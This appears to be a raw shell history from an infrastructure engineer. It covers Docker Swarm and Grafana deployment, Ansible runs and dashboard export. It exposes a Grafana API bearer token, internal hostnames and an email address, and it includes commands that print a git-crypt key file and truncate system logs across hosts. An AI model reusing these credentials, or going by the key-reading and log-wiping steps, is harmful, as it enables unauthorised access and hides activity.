+./scripts/clean_build +git status +rm -rf build +rm CMakeCache.txt CMakeFiles CPackSourceConfig.cmake CTestTestfile.cmake Makefile cmake_install.cmake +more compile_commands.json +rm compile_commands.json +ls -ltr +./scripts/clean_build +bundle exec rake test:integration:matching +sudo service docker status +sudo apt-get update +pwd +ls -la +exit +ls -la +exit +ls -la /vagrant +ls -la +exit +ls -la /vagrant +exit +ls -la /vagrant +exit +mount -o vers=3,udp /vagrant +sudo mount -o vers=3,udp /vagrant +ping +ls -la /vagrant +exit +sudo apt-get update +ls -ltr /vagrant +ls -ltr /vagrant/ +ls -la +history +sudo mount -o vers=3,udp /vagrant +sudo mount -o vers=3,udp /vagrant +sudo mount -o vers=3,udp /vagrant +exit +docker -H tcp://data001.ref01.conso.qualif.gen01.ke.p.fti.net:2375 node update --label-add data001.ref01.conso.qualif.gen01.ke.p.fti.net=true data001.ref01.conso.qualif.gen01.ke.p.fti.net +mdk node labels +docker -H tcp://data002.ref01.conso.qualif.gen01.ke.p.fti.net:2375 node update --label-add data001.ref01.conso.qualif.gen01.ke.p.fti.net=true data001.ref01.conso.qualif.gen01.ke.p.fti.net +mdk node labels +docker -H tcp://data002.ref01.conso.qualif.gen01.ke.p.fti.net:2375 node update --label-add node.labels.com.orange.melvis.instance.infra.grafana=true data001.ref01.conso.qualif.gen01.ke.p.fti.net +mdk node labels +mdk ss +docker -H tcp://data002.ref01.conso.qualif.gen01.ke.p.fti.net:2375 node update --label-rm data001.ref01.conso.qualif.gen01.ke.p.fti.net data001.ref01.conso.qualif.gen01.ke.p.fti.net +mdk node labels +mdk ss +mdk up +mdk ss +mdk d node ls +mdk node labels +mdk d node inspect data001.ref01.conso.qualif.gen01.ke.p.fti.net +mdk d node inspect data001.ref01.conso.qualif.gen01.ke.p.fti.net | jq '.[0].Spec.Labels' +mdk ss +mdk d service rm %%_grafana +mdk d node inspect data001.ref03.conso.qualif.gen01.ke.p.fti.net | jq '.[0].Spec.Labels' +mdk d node inspect data003.ref01.conso.qualif.gen01.ke.p.fti.net | jq '.[0].Spec.Labels' +mdk up +mdk ss +mdk d node inspect data001.ref03.conso.qualif.gen01.ke.p.fti.net | jq '.[0].Spec.Labels' +mdk d node inspect data001.ref01.conso.qualif.gen01.ke.p.fti.net | jq '.[0].Spec.Labels' +mdk d node update --label-rm node.labels.com.orange.melvis.instance.infra.grafana data001.ref01.conso.qualif.gen01.ke.p.fti.net +mdk d node inspect data001.ref01.conso.qualif.gen01.ke.p.fti.net | jq '.[0].Spec.Labels' +mdk d node update --label-add com.orange.melvis.instance.infra.grafana=true data001.ref01.conso.qualif.gen01.ke.p.fti.net +mdk d node inspect data001.ref01.conso.qualif.gen01.ke.p.fti.net | jq '.[0].Spec.Labels' +mdk ss +mdk logs -tf grafana +mdk logs -tf traefik +mdk logs -tf --since 1m traefik +mdk logs -tf --since 1m traefik | grep grafana +mdk up +mdk logs -tf grafana +mdk d service rm %%_grafana +mdk d config rm %%_grafana_ldap +mdk up +mdk logs -tf grafana +mdk up +mdk logs -tf grafana +mdk exec grafana bash +mdk up +mdk exec grafana bash +mdk ss +mdk exec grafana bash +mdk ps grafana +mdk ps grafana --no-trunc +mdk ps grafana | less +mdk ps grafana | less more +mdk ps grafana | more +mdk ps --no-trunc | grep grafana +mdk d network ls +mdk up +mdk ss +mdk ps grafana +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +mdk exec grafana bash +mdj up +mdk up +mdk ss +mdk logs -tf grafana +mdk d service rm %%_grafana && mdk d config rm %%_grafana_mash_provisioning && mdk up +mdk logs -tf grafana +mdk d service rm %%_grafana && mdk d config rm %%_grafana_mash_provisioning && mdk up +mdk logs -tf grafana +ssh zog +ssh atlas001.ref05.conso.qualif.gen01.ke.p.fti.net +ssh tool005.dev.search.m1.p.fti.net +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +ssh data001.ref06.conso.qualif.gen01.ke.p.fti.net +ssh es001.metriks.prod.s1.p.fti.net +ssh bastion +ssh data005.ref05.conso.qualif.gen01.ke.p.fti.net +g f +g prb +mdk ps +mdk d config ls --filter "name=djingo-dev" +PF=onyx mdk d config ls --filter "name=djingo-dev" +PF=djingo mdk d config ls --filter "name=djingo-dev" +mdk d config ls --filter "name=djingo-dev" +mdk docker config inspect %%_build-metadata +mdk docker config inspect --help %%_build-metadata +mdk docker config inspect --pretty %%_build-metadata +ll +g lg +g br +g br -a +g f -d +g f -p +g br -d selection_sur_deviceId +g br +mdk up +mdk d service rm %%_grafana && mdk d config rm %%_grafana_mash_provisioning && mdk up +cat settings.yml +ll +cat .mdk.env +vi .mdk.env +mdk ss +mdk ps grafana +mdk d service rm %%_grafana && mdk d config rm %%_grafana_mash_provisioning #&& mdk up +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +ssh tool007.dev.search.m1.p.fti.net +ssh tool006.dev.search.m1.p.fti.net +wgetsu/releases/download/1.11/gosu-amd64 +ssh zog +ll +g st +rm gosu-amd64 +mdk up +mdk ss +mdk ps +mdk ps grafana +mdk d service rm %%_grafana +mdk up +mdk ps grafana +mdk ss +mdk exec grafana bash +mdk d service rm %%_grafana && mdk d config rm %%_grafana_mash_provisioning && mdk up +mdk info +vi .mdk.env +export PF=onyx +export STACK_NAME=toto +unset STACK_NAME +unset PF +mdk d config rm %%_grafana_ldap +mdk up +vi ~/.bash +vi ~/.bashrc +pwd +vi ~/.bashrc +cat .mdk.env +export PF=onyx +export STACK_NAME=toto +unset STACK_NAME +unset PF +which powerline-go +lh /home/orobardet/bin/powerline-go +lh /home/orobardet/dev/go/bin/powerline-go +vi ~/.bashrc +ssh tool001.dev.search.m1.p.fti.net +find . -name "*.go" +ssh tool005.dev.search.m1.p.fti.net +ssh data005.ref05.conso.qualif.gen01.ke.p.fti.net +ssh atlas001.ref05.conso.qualif.gen01.ke.p.fti.net +ssh atlas002.ref05.conso.qualif.gen01.ke.p.fti.net sudo route add default gw vlan1321 +ssh atlas003.ref05.conso.qualif.gen01.ke.p.fti.net sudo route add default gw vlan1321 +ssh atlas004.ref05.conso.qualif.gen01.ke.p.fti.net sudo route add default gw vlan1321 +ssh atlas005.ref05.conso.qualif.gen01.ke.p.fti.net sudo route add default gw vlan1321 +ssh data001.ref05.conso.qualif.gen01.ke.p.fti.net sudo route add default gw vlan1321 +ssh data002.ref05.conso.qualif.gen01.ke.p.fti.net sudo route add default gw vlan1321 +ssh data003.ref05.conso.qualif.gen01.ke.p.fti.net sudo route add default gw vlan1321 +ssh data004.ref05.conso.qualif.gen01.ke.p.fti.net sudo route add default gw vlan1321 +for h in {atlas,data}.{001..005}.ref05.conso.qualif.gen01.ke.p.fti.net ; do ssh $h curl google.com ; done +for h in {atlas,data}{001..005}.ref05.conso.qualif.gen01.ke.p.fti.net ; do ssh $h curl google.com ; done +for h in {atlas,data}{001..005}.ref05.conso.qualif.gen01.ke.p.fti.net ; do echo "$h :" ; ssh $h curl -s google.com ; done +ssh bastion +for h in {atlas,data}{001..005}.ref05.conso.qualif.gen01.ke.p.fti.net ; do echo -n "$h : " ; ssh $h curl -sSf google.com > /dev/null && echo "ok" || echo " KO" ; done +for h in {atlas,data}{001..005}.ref05.conso.qualif.gen01.ke.p.fti.net ; do echo -n "$h : " ; ssh $h curl -sSf google.cm > /dev/null && echo "ok" || echo " KO" ; done +curl google.cm +for h in {atlas,data}{001..005}.ref05.conso.qualif.gen01.ke.p.fti.net ; do echo -n "$h : " ; ssh $h curl -sSf google.c > /dev/null && echo "ok" || echo " KO" ; done +for h in {atlas,data}{001..005}.ref05.conso.qualif.gen01.ke.p.fti.net ; do echo -n "$h : " ; ssh $h curl -sSf google.c &> /dev/null && echo "ok" || echo " KO" ; done +for h in {atlas,data}{001..005}.ref05.conso.qualif.gen01.ke.p.fti.net ; do echo -n "$h : " ; ssh $h curl -sSf google.com &> /dev/null && echo "ok" || echo "KO" ; done +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +ssh data001.ref04.conso.qualif.gen01.ke.p.fti.net +ssh tool001.dev.search.m1.p.fti.net +mail orobardet.ext@orange.com +jobs +kill %1 +mail orobardet.ext@orange.com +ll +sudo su +mdk ls +STACK_NAME=dceod mdk ss +STACK_NAME=dceod mdk info +ssh tool001.dev.search.m1.p.fti.net +src/bin/stack-builder bundles +sudo apt install graphviz +dot +which dot +ssh es003.metriks.prod.s1.p.fti.net +ssh tool005.dev.search.m1.p.fti.net +ll +mkdir new-code-certificates +ssh tool001.dev.search.m1.p.fti.net +scp tool001.dev.search.m1.p.fti.net:code.search.orangeportails.net.* . +ssh tool001.dev.search.m1.p.fti.net +scp tool001.dev.search.m1.p.fti.net:code.search.orangeportails.net.* . +scp * tool002.dev.search.m1.p.fti.net +scp * tool002.dev.search.m1.p.fti.net: +scp * tool003.dev.search.m1.p.fti.net: +scp * tool004.dev.search.m1.p.fti.net: +scp * tool005.dev.search.m1.p.fti.net: +scp * tool006.dev.search.m1.p.fti.net: +scp * tool007.dev.search.m1.p.fti.net: +ll +ssh tool001.dev.search.m1.p.fti.net +ssh tool002.dev.search.m1.p.fti.net +ssh tool001.dev.search.m1.p.fti.net +ssh tool002.dev.search.m1.p.fti.net +ssh tool004.dev.search.m1.p.fti.net +ssh tool005.dev.search.m1.p.fti.net +ssh tool006.dev.search.m1.p.fti.net +ssh tool007.dev.search.m1.p.fti.net +rm -fr new-code-certificates/ +df -h +free -h +ssh tool005.dev.search.m1.p.fti.net +ssh tool006 +ssh tool006.dev.search.m1.p.fti.net +ll +ll +ansible-doc +ansible-doc apt +ansible-doc -l | grep apt +ansible-doc apt_repository +man apt +man dpkg +ansible-playbook -i inventory/ref01 -l data001.ref01.conso.qualif.gen01.ke.p.fti.net --check beats.yml +ansible-playbook -i inventory/ref01 -l data001.ref01.conso.qualif.gen01.ke.p.fti.net --check --diff beats.yml +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +ssh es101.search.prod.metriks.m1.p.fti.net +ansible-playbook -i inventory/ref01 -l data001.ref01.conso.qualif.gen01.ke.p.fti.net beats.yml +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +ssh -v data001.ref01.conso.qualif.gen01.ke.p.fti.net +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +ssh -v data001.ref01.conso.qualif.gen01.ke.p.fti.net +ssh bastion +vi ~/.ssh/config +nslookup opbar.hbx.geo.francetelecom.fr +ssh +ssh +ssh +ping +ssh +host +host +#ansible-playbook -i inventory/ref01 -l data001.ref01.conso.qualif.gen01.ke.p.fti.net beats.yml +vi ~/.ssh/config +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +ansible-doc -l | grep systemd +ansible-doc systemd +ansible-playbook -i inventory/ref01 -l data001.ref01.conso.qualif.gen01.ke.p.fti.net beats.yml +git crypt --version +sudo apt install git-crypt +cat ~/.metriks-git-crypt.key +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +ll +mdk ss +mdk d service rm %%_metricbeat +mdk ss +ll +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +ssh atlas001.ref01.conso.qualif.gen01.ke.p.fti.net +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +sudo systemctl status metricbeat +ansible-playbook -i inventory/ref01 beats.yml +ansible-playbook -i inventory/ref01 -l data001.ref01.conso.qualif.gen01.ke.p.fti.net beats.yml +ssh es001.metriks.prod.s1.p.fti.net +host kibana-eui.metriks.hbx.geo.francetelecom.fr +ansible-playbook -i inventory/ref01 -l data001.ref01.conso.qualif.gen01.ke.p.fti.net -m setup +ansible -i inventory/ref01 -l data001.ref01.conso.qualif.gen01.ke.p.fti.net -m setup +ansible -i inventory/ref01 data001.ref01.conso.qualif.gen01.ke.p.fti.net -m setup +ansible -i inventory/ref01 data001.ref01.conso.qualif.gen01.ke.p.fti.net -m setup | jq '.' | les +ansible -i inventory/ref01 data001.ref01.conso.qualif.gen01.ke.p.fti.net -m setup | jq '.' | less +ansible -i inventory/ref01 data001.ref01.conso.qualif.gen01.ke.p.fti.net -m setup | jq '.' +ansible -i inventory/ref01 data001.ref01.conso.qualif.gen01.ke.p.fti.net -m setup +ansible -i inventory/ref01 data001.ref01.conso.qualif.gen01.ke.p.fti.net -m setup -a "filter=ansible_distribution" +ansible -i inventory/ref01 data001.ref01.conso.qualif.gen01.ke.p.fti.net -m setup -a "filter=ansible_distribution*" +ansible -i inventory/ref01 data001.ref01.conso.qualif.gen01.ke.p.fti.net -m setup -a "filter=ansible_service*" +ansible-playbook -i inventory/ref01 -l data001.ref01.conso.qualif.gen01.ke.p.fti.net beats.yml +md5sum ~/.metriks-git-crypt.key +md5sum -b ~/.metriks-git-crypt.key +md5sum --help -b ~/.metriks-git-crypt.key +sha256sum +sha256sum ~/.metriks-git-crypt.key +sha256sum --help +sha256sum --quiet ~/.metriks-git-crypt.key +sha256sum -b --tag ~/.metriks-git-crypt.key +sha256sum -b ~/.metriks-git-crypt.key +ll +chmod +x vault_pass +./vault_pass +dpkg -S $(which shad256sum) +dpkg -S $(which sha256sum) +./vault_pass +man ansible-vault +./vault_pass +ll ~/.metriks-git-crypt.key +./vault_pass +man test +MELVIS_CRYPT_KEY_FILE=toto ./vault_pass +./vault_pass +[[ -f "~/.metriks-git-crypt.key" ]] +[[ -f ~/.metriks-git-crypt.key ]] +./vault_pass +MELVIS_CRYPT_KEY_FILE=toto ./vault_pass +./vault_pass +sha256sum -b ~/.metriks-git-crypt.key +sha256sum -b ~/.metriks-git-crypt.key2 +./vault_pass +ansible-vault create group_vars/vault_all.yml +ansible-vault view group_vars/vault_all.yml +ansible-playbook -i inventory/ref01 -l data001.ref01.conso.qualif.gen01.ke.p.fti.net beats.yml +ansible-vault view group_vars/vault_all.yml +ansible-playbook -i inventory/ref01 -l data001.ref01.conso.qualif.gen01.ke.p.fti.net beats.yml +ll +ll +g fetch +g prb +vi .mdk.env +mdk d node ls +mdk ls +STACK_NAME=eui-backup mdk ps +mdk ps +mdk d node ls +STACK_NAME=eui-backup mdk ps +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +ps aux | grep Go +mdk up +mdk ss +mdk ps +mdk s service rm %%_metricbeat +mdk d service rm %%_metricbeat +mdk ss +mdk ps +history | grep ansible +ansible-playbook -i inventory/ref01 beats.yml +ansible-config view +cat ~/.ansible.cfg +cat /etc/ansible/ansible.cfg +ansible-vault edit group_vars/all/vault_all.yml +ansible-vault +ansible-vault --help +ansible-vault view group_vars/all/vault_all.yml +ansible-vault view --help +ansible-vault view group_vars/all/vault_all.yml | mess +ansible-vault view group_vars/all/vault_all.yml | grep -E "." +ansible-vault view group_vars/all/vault_all.yml | grep -E "fefzfzefzkzepfkze|" +[A +ansible-vault view group_vars/all/vault_all.yml | grep -E "fefzfzefzkzepfkze|" +ansible-playbook -i inventory/ref01 beats.yml +ansible-manager project update +ll +g f +g prb +ll +cat my-compose.yml.off +cat my-compose.yml +cat vimdiff my-compose.yml my-compose.yml.off +vimdiff my-compose.yml my-compose.yml.off +ll +cat my-compose.yml +cat .mdk.env +mdk up +mdk ssw +mdk ps logstash +watch -n 1 mdk ps logstash +mdk logs -tf --since 1m logstash +ssh tool005.dev.search.m1.p.fti.net +make unittest +ssh tool001.dev.search.m1.p.fti.net +ll +vi compose/docker-compose.yml +git stash --help +git stash -m "Use latest Traefik" +git stash push -m "Use latest Traefik" +ssh zog +ll +make unittest +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +ll +history | grep ansible +ansible-playbook -i inventory/ref01 beats.yml +sudo apt update" +sudo apt update +sudo apt upgrade +ll +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +l +g co master +g f +g prb +g co 37-retrait-metricbeat +g rebase master +mdk ss +mdk ps grafana +PF=ref04 mdk ss +PF=onyx mdk ss +PF=ref05 mdk ss +mdk ps grafana +ansible-vault +ssh data001.ref01.conso.qualif.gen01.ke.p.fti.net +mdk exec grafana bash +ps aux | grep goland +ps aux | grep -i goland +ansible-vault view group_vars/all/vault_all.yml +ll +g st +cat .gitignore +g f +g prb +vi .gitignore +g st +g add .gitignore +g lg +g ci -m "Ignore build directory" +ll +g push +g push -u origin master +vi compose/pas +vi compose/passwords.yml +vi compose/my-compose.yml +vi my-de +vi compose/my-deploy-ref01.yml +make build +vi build/conformite-rec/ref01/docker-compose.yml +mdk ss +mdk info +mdk ss +mdk ps es-master +mdk ps es-client +mdk ps es-data-node +mdk ps es-data-speed +mdk logs -tf --since 1m es-data-speed +ll +vi compose/my-deploy-ref01.yml +vi compose/my-compose.yml +mdk up +mdk ss +mdk logs -tf --since 1m es-data-speed +mdk ps es-data-speed +mdk logs -tf --since 1m es-data-speed +mdk ps es-data-speed +mdk ss +mdk d service update --force %%-cerebro +mdk d service update --force %%_cerebro +mdk ss +ansible-playbook -i inventory/ref01 beats.yml +ssh data005.ref01.conso.qualif.gen01.ke.p.fti.net +ssh ihm001.kelogs.prod.gen01.ke.p.fti.net +g f +g prb +g st +g diff +g checkout -- compose/my-compose.yml compose/my-deploy-ref01.yml +g prb +mdk d service update --force %%_cerebro +mdk ss +ssh data005.ref01.conso.qualif.gen01.ke.p.fti.net +echo $JAVA_HOME +ll $JAVA_HOME +ll /usr/lib/jvm/ +java --version +java -versop, +java -version +ssh atlas001.ref01.conso.qualif.gen01.ke.p.fti.net +ll +ansible-playbook -i inventory/ref01 beats.yml +ssh atlas001.ref01.conso.qualif.gen01.ke.p.fti.net +truncate --help +for h in {data,atlas}00{1..5}.ref01.conso.qualif.gen01.ke.p.fti.net ; do echo $h done +for h in {data,atlas}00{1..5}.ref01.conso.qualif.gen01.ke.p.fti.net ; do echo $h ; done +for h in {data,atlas}00{1..5}.ref01.conso.qualif.gen01.ke.p.fti.net ; do ssh $h -- sudo truncate --size 0 /var/log/daemon.log /var/log/syslog ; done +ssh atlas005.ref01.conso.qualif.gen01.ke.p.fti.net +git-crypt ls +git-crypt help +git-crypt status +vi .env +touch .env +make build-instance +mdk build +ll +g f +g prb +mdk ss +mdk ps cerebro +mdk ps cerebro | less +mdk ps --no-trunc | grep cerebro +ssh atlas002.ref01.conso.qualif.gen01.ke.p.fti.net +logstash-divisu-sophia.metriks.hbx.geo.francetelecom.fr +host logstash-divisu-sophia.metriks.hbx.geo.francetelecom.fr +host logstash-divisu.metriks.hbx.geo.francetelecom.fr +host logstash-divisu-rec.metriks.hbx.geo.francetelecom.fr +host logstash-divisu-reca.metriks.hbx.geo.francetelecom.fr +host logstash-divisu-rec.metriks.hbx.geo.francetelecom.fr +ssh admin.infra.multis.p.fti.net +l +ll +vi settings.yml +ssh es002.metriks.prod.s1.p.fti.net +PF=onyx mdk ls +PF=onyx STACK_NAME mdk ps curator +PF=onyx STACK_NAME=bac-backup mdk ps curator +PF=onyx STACK_NAME=boi-rec mdk ps curator +PF=onyx STACK_NAME=bugbounty-prod mdk ps curator +PF=onyx STACK_NAME=cloud-dev mdk ps curator +PF=onyx STACK_NAME=divisu mdk ps curator +PF=onyx STACK_NAME=conformite-prod mdk ps curator +PF=onyx STACK_NAME=divisu-red mdk ps curator +PF=onyx STACK_NAME=divisu-rec mdk ps curator +PF=onyx STACK_NAME=djingo-prod mdk ps curator +PF=onyx STACK_NAME=eui-backup mdk ps curator +PF=onyx STACK_NAME=infra mdk ps curator +PF=onyx STACK_NAME=mash mdk ps curator +PF=onyx STACK_NAME=pac mdk ps curator +PF=onyx STACK_NAME=securite mdk ps curator +PF=onyx STACK_NAME=vault-preprod mdk ps curator +PF=onyx STACK_NAME=vault-prod mdk ps curator +PF=onyx STACK_NAME=cloud-dev mdk ps curator +PF=onyx STACK_NAME=cloud-dev mdk ps +PF=onyx STACK_NAME=cloud-dev mdk ss +PF=onyx STACK_NAME=boi-rec mdk ss +PF=onyx STACK_NAME=vault-preprod mdk ss +PF=onyx STACK_NAME=vault-prod mdk ss +PF=onyx STACK_NAME=vault-prod mdk node ls +PF=onyx STACK_NAME=vault-prod mdk d node ls +PF=onyx STACK_NAME=vault-prod mdk node labels | grep -E "cloud-dev_esdata-speed|" +PF=onyx STACK_NAME=vault-prod mdk node labels | grep -E "cloud-dev_es|" +PF=onyx STACK_NAME=vault-prod mdk node labels | grep -E "cloud-dev.es|" +PF=onyx STACK_NAME=cloud-dev mdk ss +PF=onyx STACK_NAME=vault-preprod mdk ss +PF=onyx STACK_NAME=vault-prod mdk ss +PF=onyx STACK_NAME=vault-prod mdk node labels | grep -E "vault-preprod.es-data|" +g cl git@ssh.code.search.hbx.geo.francetelecom.fr:metriks/instance/cloud-dev.git +git-crypt unlock ~/.metriks-git-crypt.key +vi .mdk.env +mdk ss +mdk redeploy +mdk ss +git stash ls +git stash list +git stash pop +mdk deploy +sudo apt install tilix +sudo add-apt-repository ppa:webupd8team/terminix +sudo apt install tilix +sudo apt update +sudo apt install tilix +tilix & +vi ~/.bashrc +ll /etc/profile.d/vte.sh +tilix & +command __vte_osc7 +command "__vte_osc7" +vi ~/.bashrc +tilix & +ll +git remote set-url origin git@gitlab.si.francetelecom.fr:melvis/docker-images/ubuntu.git +g f +g prb +g lg +g show cdae +mdk build +mdk up +mdk d service rm %%_grafana +mdk d config rm %%_grafana_ldap %%_grafana_mash_datasources_provisioning +mdk up +mdk ss +mdk logs grafana +mdk d service rm %%_grafana +mdk d config rm %%_grafana_ldap %%_grafana_mash_datasources_provisioning +mdk d config rm %%_grafana_ldap %%_grafana_mash_provisioning +mdk up +mdk exec grafana +mdk exec grafana bash +mdk d service rm %%_grafana +mdk d config rm %%_grafana_ldap %%_grafana_mash_datasources_provisioning +mdk up +mdk d service rm %%_grafana +mdk d config rm %%_grafana_ldap %%_grafana_mash_datasources_provisioning +mdk up +docker pull registry.gitlab.si.francetelecom.fr/build-images/dind-go-kubernetes:sdk-0-7-2 +docker images +docker inspect --format=‘{{index .RepoDigests 0}}’ registry.gitlab.si.francetelecom.fr/build-images/dind-go-kubernetes:sdk-0-7-2 +docker inspect --format='{{index .RepoDigests 0}}' registry.gitlab.si.francetelecom.fr/build-images/dind-go-kubernetes:sdk-0-7-2 +docker image inspect --format='{{index .RepoDigests 0}}' registry.gitlab.si.francetelecom.fr/build-images/dind-go-kubernetes:sdk-0-7-2 +docker image inspect registry.gitlab.si.francetelecom.fr/build-images/dind-go-kubernetes:sdk-0-7-2 | jq. +docker image inspect registry.gitlab.si.francetelecom.fr/build-images/dind-go-kubernetes:sdk-0-7-2 | jq . +docker image inspect --format='{{.Id}}' registry.gitlab.si.francetelecom.fr/build-images/dind-go-kubernetes:sdk-0-7-2 +docker images --digest +docker images --digests +docker rmi registry.gitlab.si.francetelecom.fr/build-images/dind-go-kubernetes:sdk-0-7-2 +curl +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" +ll +g cl git@gitlab.si.francetelecom.fr:melvis/monitoring/grafana-dashboards.git +ll +touch dashboards-uid.json +vi dashboards-uid.json +pw +pwd +git st +git st +git rm --cached secrets.env +git st +git rm --cached secrets.env +git rm -f --cached secrets.env +git st +git add .gitignore dashboards-uid.json +git st +jq --help +jq '.' dashboards-uid.json +jq '.' dashboards-uid.json +jq -r '.' dashboards-uid.json +jq -r '.[]' dashboards-uid.json +ll +./export-dashboards.sh +jq -r '.toto' dashboards-uid.json +./export-dashboards.sh +jq --help +./export-dashboards.sh +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" | jq '.' +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" )' +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" )' +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" )' +curl -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | .uid' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | .uid' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | .uid' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | .uid' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | [.uid]' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | [.uid]' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | .[uid]' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | .uid[]' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | .uid | []' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | .uid' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | .uid.[]' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | [.uid]' +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" ) | .uid]' +jq 'count(.)' dashboards-uid.json +jq '. | length" dashboards-uid.json +jq '. | length' dashboards-uid.json +./export-dashboards.sh +curl -s -H "Accept: application/json" -H "Authorization: Bearer eyJrIjoidDM1TFNMWU15Q1VQR1RiMFR2bTVKcFM4Z3NjVHpLdVMiLCJuIjoiZXhwb3J0LWRhc2hib2FyZCIsImlkIjoxfQ==" +./export-dashboards.sh +curl -s -H Accept: application/json -H Authorization: Bearer 